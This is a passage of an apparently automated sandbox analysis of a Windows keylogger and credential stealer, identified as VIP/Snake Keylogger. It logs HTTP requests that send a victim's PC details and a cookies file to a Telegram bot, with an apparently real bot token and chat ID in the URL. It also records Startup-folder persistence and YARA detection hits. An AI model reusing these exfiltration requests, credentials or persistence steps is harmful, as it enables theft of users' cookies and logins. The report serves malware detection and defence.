                                                                                                                  2025-01-11 00:28:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  20192.168.2.555499149.154.167.2204436148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:28:09 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:42:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20376483%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                  Host: api.telegram.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-11 00:28:09 UTC344INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:09 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 55
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-11 00:28:09 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  21192.168.2.555539149.154.167.2204436148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:28:15 UTC352OUTPOST /bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendDocument?chat_id=1886630858&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary=------------------------8dd326de7d68210
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 1279
                                                                                                                  2025-01-11 00:28:15 UTC1279OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 36 64 65 37 64 36 38 32 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 33 37 36 34 38 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20
                                                                                                                  Data Ascii: --------------------------8dd326de7d68210Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:376483Date and Time: 10/01/2025
                                                                                                                  2025-01-11 00:28:15 UTC346INHTTP/1.1 400 Bad Request
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:15 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 56
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-11 00:28:15 UTC56INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
                                                                                                                  Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:19:27:32
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\Desktop\6BRa130JDj.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\6BRa130JDj.exe"
                                                                                                                  Imagebase:0x2b0000
                                                                                                                  File size:1'055'744 bytes
                                                                                                                  MD5 hash:CB47B81059D6E0B15AD2AB00C3491C48
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:19:27:36
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\AppData\Local\Allene\ectosphere.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\6BRa130JDj.exe"
                                                                                                                  Imagebase:0x20000
                                                                                                                  File size:1'055'744 bytes
                                                                                                                  MD5 hash:CB47B81059D6E0B15AD2AB00C3491C48
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 75%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:19:27:39
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\6BRa130JDj.exe"
                                                                                                                  Imagebase:0x9a0000
                                                                                                                  File size:45'984 bytes
                                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4526688861.0000000000423000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4526688861.000000000043A000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4529175077.0000000002D6B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:19:27:50
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs"
                                                                                                                  Imagebase:0x7ff6f0470000
                                                                                                                  File size:170'496 bytes
                                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:19:27:51
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\AppData\Local\Allene\ectosphere.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Allene\ectosphere.exe"
                                                                                                                  Imagebase:0x20000
                                                                                                                  File size:1'055'744 bytes
                                                                                                                  MD5 hash:CB47B81059D6E0B15AD2AB00C3491C48
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:7
                                                                                                                  Start time:19:27:55
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Allene\ectosphere.exe"
                                                                                                                  Imagebase:0xf40000
                                                                                                                  File size:45'984 bytes
                                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:3.4%
                                                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                    Signature Coverage:6.8%
                                                                                                                    Total number of Nodes:2000
                                                                                                                    Total number of Limit Nodes:58
                                                                                                                    execution_graph 101017 2f416f 101021 305fe6 101017->101021 101019 2f417a 101020 305fe6 85 API calls 101019->101020 101020->101019 101027 306020 101021->101027 101029 305ff3 101021->101029 101022 306022 101060 2b9328 84 API calls Mailbox 101022->101060 101024 306027 101032 2b9837 101024->101032 101027->101019 101029->101022 101029->101024 101029->101027 101030 30601a 101029->101030 101059 2b95a0 59 API calls _wcsstr 101030->101059 101033 2b984b 101032->101033 101034 2b9851 101032->101034 101050 2b7b2e 101033->101050 101035 2ef5d3 __i64tow 101034->101035 101036 2b9899 101034->101036 101037 2b9857 __itow 101034->101037 101042 2ef4da 101034->101042 101075 2d3698 83 API calls 3 library calls 101036->101075 101061 2d0db6 101037->101061 101041 2b9871 101041->101033 101071 2b7de1 101041->101071 101043 2d0db6 Mailbox 59 API calls 101042->101043 101045 2ef552 Mailbox _wcscpy 101042->101045 101046 2ef51f 101043->101046 101076 2d3698 83 API calls 3 library calls 101045->101076 101047 2d0db6 Mailbox 59 API calls 101046->101047 101048 2ef545 101047->101048 101048->101045 101049 2b7de1 59 API calls 101048->101049 101049->101045 101051 2eec6b 101050->101051 101052 2b7b40 101050->101052 101111 307bdb 59 API calls _memmove 101051->101111 101105 2b7a51 101052->101105 101055 2b7b4c 101055->101027 101056 2eec75 101112 2b8047 101056->101112 101058 2eec7d Mailbox 101059->101027 101060->101024 101063 2d0dbe 101061->101063 101064 2d0dd8 101063->101064 101066 2d0ddc std::exception::exception 101063->101066 101077 2d571c 101063->101077 101094 2d33a1 DecodePointer 101063->101094 101064->101041 101095 2d859b RaiseException 101066->101095 101068 2d0e06 101096 2d84d1 58 API calls _free 101068->101096 101070 2d0e18 101070->101041 101072 2b7df0 __NMSG_WRITE _memmove 101071->101072 101073 2d0db6 Mailbox 59 API calls 101072->101073 101074 2b7e2e 101073->101074 101074->101033 101075->101037 101076->101035 101078 2d5797 101077->101078 101084 2d5728 101077->101084 101103 2d33a1 DecodePointer 101078->101103 101080 2d579d 101104 2d8b28 58 API calls __getptd_noexit 101080->101104 101083 2d575b RtlAllocateHeap 101083->101084 101093 2d578f 101083->101093 101084->101083 101086 2d5783 101084->101086 101087 2d5733 101084->101087 101091 2d5781 101084->101091 101100 2d33a1 DecodePointer 101084->101100 101101 2d8b28 58 API calls __getptd_noexit 101086->101101 101087->101084 101097 2da16b 58 API calls 2 library calls 101087->101097 101098 2da1c8 58 API calls 6 library calls 101087->101098 101099 2d309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101087->101099 101102 2d8b28 58 API calls __getptd_noexit 101091->101102 101093->101063 101094->101063 101095->101068 101096->101070 101097->101087 101098->101087 101100->101084 101101->101091 101102->101093 101103->101080 101104->101093 101106 2b7a5f 101105->101106 101108 2b7a85 _memmove 101105->101108 101107 2d0db6 Mailbox 59 API calls 101106->101107 101106->101108 101109 2b7ad4 101107->101109 101108->101055 101110 2d0db6 Mailbox 59 API calls 101109->101110 101110->101108 101111->101056 101113 2b805a 101112->101113 101114 2b8052 101112->101114 101113->101058 101116 2b7f77 59 API calls 2 library calls 101114->101116 101116->101113 101117 2efdfc 101157 2bab30 Mailbox _memmove 101117->101157 101122 2bb525 101223 319e4a 89 API calls 4 library calls 101122->101223 101124 2f0055 101222 319e4a 89 API calls 4 library calls 101124->101222 101127 2d0db6 59 API calls Mailbox 101145 2b9f37 Mailbox 101127->101145 101129 2bb475 101134 2b8047 59 API calls 101129->101134 101130 2b8047 59 API calls 101130->101145 101131 2f0064 101140 2ba057 101134->101140 101135 2bb47a 101135->101124 101144 2f09e5 101135->101144 101137 2b7667 59 API calls 101137->101145 101138 306e8f 59 API calls 101138->101145 101139 2b7de1 59 API calls 101139->101157 101141 2f09d6 101227 319e4a 89 API calls 4 library calls 101141->101227 101143 2d2d40 67 API calls __cinit 101143->101145 101228 319e4a 89 API calls 4 library calls 101144->101228 101145->101124 101145->101127 101145->101129 101145->101130 101145->101135 101145->101137 101145->101138 101145->101140 101145->101141 101145->101143 101146 2ba55a 101145->101146 101172 2bc8c0 331 API calls 2 library calls 101145->101172 101173 2bb900 60 API calls Mailbox 101145->101173 101226 319e4a 89 API calls 4 library calls 101146->101226 101149 2d0db6 59 API calls Mailbox 101149->101157 101150 2bb2b6 101216 2bf6a3 331 API calls 101150->101216 101153 2f086a 101154 2b9c90 Mailbox 59 API calls 101153->101154 101158 2f085c 101154->101158 101155 2f0878 101225 319e4a 89 API calls 4 library calls 101155->101225 101157->101122 101157->101139 101157->101140 101157->101145 101157->101149 101157->101150 101157->101153 101157->101155 101157->101158 101159 2bb21c 101157->101159 101162 306e8f 59 API calls 101157->101162 101166 32df37 101157->101166 101169 32df23 101157->101169 101174 2b9ea0 101157->101174 101198 2b9c90 101157->101198 101217 32c193 85 API calls 2 library calls 101157->101217 101218 32c2e0 96 API calls Mailbox 101157->101218 101219 317956 59 API calls Mailbox 101157->101219 101220 32bc6b 331 API calls Mailbox 101157->101220 101221 30617e 59 API calls Mailbox 101157->101221 101158->101140 101224 30617e 59 API calls Mailbox 101158->101224 101203 2b9d3c 101159->101203 101161 2bb22d 101163 2b9d3c 60 API calls 101161->101163 101162->101157 101163->101150 101229 32cadd 101166->101229 101168 32df47 101168->101157 101170 32cadd 130 API calls 101169->101170 101171 32df33 101170->101171 101171->101157 101172->101145 101173->101145 101175 2b9ebf 101174->101175 101195 2b9eed Mailbox 101174->101195 101176 2d0db6 Mailbox 59 API calls 101175->101176 101176->101195 101177 2d2d40 67 API calls __cinit 101177->101195 101178 2bb475 101179 2b8047 59 API calls 101178->101179 101188 2ba057 101179->101188 101180 2bb47a 101181 2f09e5 101180->101181 101182 2f0055 101180->101182 101373 319e4a 89 API calls 4 library calls 101181->101373 101370 319e4a 89 API calls 4 library calls 101182->101370 101183 2ba55a 101371 319e4a 89 API calls 4 library calls 101183->101371 101186 2d0db6 59 API calls Mailbox 101186->101195 101188->101157 101189 2f0064 101189->101157 101191 2b8047 59 API calls 101191->101195 101193 2b7667 59 API calls 101193->101195 101194 306e8f 59 API calls 101194->101195 101195->101177 101195->101178 101195->101180 101195->101182 101195->101183 101195->101186 101195->101188 101195->101191 101195->101193 101195->101194 101196 2f09d6 101195->101196 101368 2bc8c0 331 API calls 2 library calls 101195->101368 101369 2bb900 60 API calls Mailbox 101195->101369 101372 319e4a 89 API calls 4 library calls 101196->101372 101200 2b9c9b 101198->101200 101199 2b9cd2 101199->101157 101200->101199 101374 2b8cd4 59 API calls Mailbox 101200->101374 101202 2b9cfd 101202->101157 101204 2b9d4a 101203->101204 101214 2b9d78 Mailbox 101203->101214 101205 2b9d9d 101204->101205 101208 2b9d50 Mailbox 101204->101208 101206 2b8047 59 API calls 101205->101206 101206->101214 101207 2b9d64 101209 2b9d6f 101207->101209 101210 2b9dcc 101207->101210 101207->101214 101208->101207 101211 2efa0f 101208->101211 101213 2ef9e6 VariantClear 101209->101213 101209->101214 101210->101214 101375 2b8cd4 59 API calls Mailbox 101210->101375 101211->101214 101376 306e8f 59 API calls 101211->101376 101213->101214 101214->101161 101216->101122 101217->101157 101218->101157 101219->101157 101220->101157 101221->101157 101222->101131 101223->101158 101224->101140 101225->101158 101226->101140 101227->101144 101228->101140 101230 2b9837 84 API calls 101229->101230 101231 32cb1a 101230->101231 101233 32cb61 Mailbox 101231->101233 101267 32d7a5 101231->101267 101233->101168 101234 32cf2e 101316 32d8c8 92 API calls Mailbox 101234->101316 101237 32cf3d 101238 32cdc7 101237->101238 101240 32cf49 101237->101240 101280 32c96e 101238->101280 101239 2b9837 84 API calls 101257 32cbb2 Mailbox 101239->101257 101240->101233 101245 32ce00 101295 2d0c08 101245->101295 101248 32ce33 101302 2b92ce 101248->101302 101249 32ce1a 101301 319e4a 89 API calls 4 library calls 101249->101301 101252 32ce25 GetCurrentProcess TerminateProcess 101252->101248 101253 32cdb9 101253->101234 101253->101238 101257->101233 101257->101239 101257->101253 101299 32fbce 59 API calls 2 library calls 101257->101299 101300 32cfdf 61 API calls 2 library calls 101257->101300 101258 32cfa4 101258->101233 101263 32cfb8 FreeLibrary 101258->101263 101260 32ce6b 101314 32d649 107 API calls _free 101260->101314 101263->101233 101265 2b9d3c 60 API calls 101266 32ce7c 101265->101266 101266->101258 101266->101265 101315 2b8d40 59 API calls Mailbox 101266->101315 101317 32d649 107 API calls _free 101266->101317 101318 2b7e4f 101267->101318 101269 32d7c0 CharLowerBuffW 101322 30f167 101269->101322 101273 32d858 Mailbox 101273->101257 101277 32d810 101347 2b7d2c 101277->101347 101279 32d81c Mailbox 101279->101273 101351 32cfdf 61 API calls 2 library calls 101279->101351 101281 32c9de 101280->101281 101282 32c989 101280->101282 101286 32da50 101281->101286 101283 2d0db6 Mailbox 59 API calls 101282->101283 101285 32c9ab 101283->101285 101284 2d0db6 Mailbox 59 API calls 101284->101285 101285->101281 101285->101284 101287 32dc79 Mailbox 101286->101287 101294 32da73 _strcat _wcscpy __NMSG_WRITE 101286->101294 101287->101245 101288 2b9be6 59 API calls 101288->101294 101289 2b9b3c 59 API calls 101289->101294 101290 2b9b98 59 API calls 101290->101294 101291 2b9837 84 API calls 101291->101294 101292 2d571c 58 API calls std::exception::_Copy_str 101292->101294 101294->101287 101294->101288 101294->101289 101294->101290 101294->101291 101294->101292 101358 315887 61 API calls 2 library calls 101294->101358 101296 2d0c1d 101295->101296 101297 2d0cb5 VirtualProtect 101296->101297 101298 2d0c83 101296->101298 101297->101298 101298->101248 101298->101249 101299->101257 101300->101257 101301->101252 101303 2b92d6 101302->101303 101304 2d0db6 Mailbox 59 API calls 101303->101304 101305 2b92e4 101304->101305 101306 2b92f0 101305->101306 101359 2b91fc 59 API calls Mailbox 101305->101359 101308 2b9050 101306->101308 101360 2b9160 101308->101360 101310 2b905f 101311 2d0db6 Mailbox 59 API calls 101310->101311 101312 2b90fb 101310->101312 101311->101312 101312->101266 101313 2b8d40 59 API calls Mailbox 101312->101313 101313->101260 101314->101266 101315->101266 101316->101237 101317->101266 101319 2b7e62 101318->101319 101321 2b7e5f _memmove 101318->101321 101320 2d0db6 Mailbox 59 API calls 101319->101320 101320->101321 101321->101269 101324 30f192 __NMSG_WRITE 101322->101324 101323 30f1d1 101323->101279 101329 2b7667 101323->101329 101324->101323 101327 30f1c7 101324->101327 101328 30f278 101324->101328 101327->101323 101352 2b78c4 61 API calls 101327->101352 101328->101323 101353 2b78c4 61 API calls 101328->101353 101330 2d0db6 Mailbox 59 API calls 101329->101330 101331 2b7688 101330->101331 101332 2d0db6 Mailbox 59 API calls 101331->101332 101333 2b7696 101332->101333 101334 2b784b 101333->101334 101335 2b785a 101334->101335 101336 2b78b7 101334->101336 101335->101336 101338 2b7865 101335->101338 101337 2b7d2c 59 API calls 101336->101337 101343 2b7888 _memmove 101337->101343 101339 2eeb09 101338->101339 101340 2b7880 101338->101340 101355 2b8029 101339->101355 101354 2b7f27 59 API calls Mailbox 101340->101354 101343->101277 101344 2eeb13 101345 2d0db6 Mailbox 59 API calls 101344->101345 101346 2eeb33 101345->101346 101348 2b7d43 _memmove 101347->101348 101349 2b7d3a 101347->101349 101348->101279 101349->101348 101350 2b7e4f 59 API calls 101349->101350 101350->101348 101351->101273 101352->101327 101353->101328 101354->101343 101356 2d0db6 Mailbox 59 API calls 101355->101356 101357 2b8033 101356->101357 101357->101344 101358->101294 101359->101306 101361 2b9169 Mailbox 101360->101361 101362 2ef19f 101361->101362 101367 2b9173 101361->101367 101363 2d0db6 Mailbox 59 API calls 101362->101363 101365 2ef1ab 101363->101365 101364 2b917a 101364->101310 101366 2b9c90 Mailbox 59 API calls 101366->101367 101367->101364 101367->101366 101368->101195 101369->101195 101370->101189 101371->101188 101372->101181 101373->101188 101374->101202 101375->101214 101376->101214 101377 2b107d 101382 2b708b 101377->101382 101379 2b108c 101413 2d2d40 101379->101413 101383 2b709b __write_nolock 101382->101383 101384 2b7667 59 API calls 101383->101384 101385 2b7151 101384->101385 101416 2b4706 101385->101416 101387 2b715a 101423 2d050b 101387->101423 101394 2b7667 59 API calls 101395 2b718b 101394->101395 101442 2b7d8c 101395->101442 101397 2b7194 RegOpenKeyExW 101398 2ee8b1 RegQueryValueExW 101397->101398 101402 2b71b6 Mailbox 101397->101402 101399 2ee8ce 101398->101399 101400 2ee943 RegCloseKey 101398->101400 101401 2d0db6 Mailbox 59 API calls 101399->101401 101400->101402 101412 2ee955 _wcscat Mailbox __NMSG_WRITE 101400->101412 101403 2ee8e7 101401->101403 101402->101379 101446 2b522e 101403->101446 101406 2b79f2 59 API calls 101406->101412 101407 2ee90f 101449 2b7bcc 101407->101449 101409 2ee929 101409->101400 101410 2b7de1 59 API calls 101410->101412 101411 2b3f74 59 API calls 101411->101412 101412->101402 101412->101406 101412->101410 101412->101411 101480 2d2c44 101413->101480 101415 2b1096 101458 2e1940 101416->101458 101419 2b7de1 59 API calls 101420 2b4739 101419->101420 101460 2b4750 101420->101460 101422 2b4743 Mailbox 101422->101387 101424 2e1940 __write_nolock 101423->101424 101425 2d0518 GetFullPathNameW 101424->101425 101426 2d053a 101425->101426 101427 2b7bcc 59 API calls 101426->101427 101428 2b7165 101427->101428 101429 2b7cab 101428->101429 101430 2eed4a 101429->101430 101431 2b7cbf 101429->101431 101432 2b8029 59 API calls 101430->101432 101474 2b7c50 101431->101474 101435 2eed55 __NMSG_WRITE _memmove 101432->101435 101434 2b7173 101436 2b3f74 101434->101436 101437 2b3f82 101436->101437 101441 2b3fa4 _memmove 101436->101441 101440 2d0db6 Mailbox 59 API calls 101437->101440 101438 2d0db6 Mailbox 59 API calls 101439 2b3fb8 101438->101439 101439->101394 101440->101441 101441->101438 101443 2b7d99 101442->101443 101444 2b7da6 101442->101444 101443->101397 101445 2d0db6 Mailbox 59 API calls 101444->101445 101445->101443 101447 2d0db6 Mailbox 59 API calls 101446->101447 101448 2b5240 RegQueryValueExW 101447->101448 101448->101407 101448->101409 101450 2b7bd8 __NMSG_WRITE 101449->101450 101451 2b7c45 101449->101451 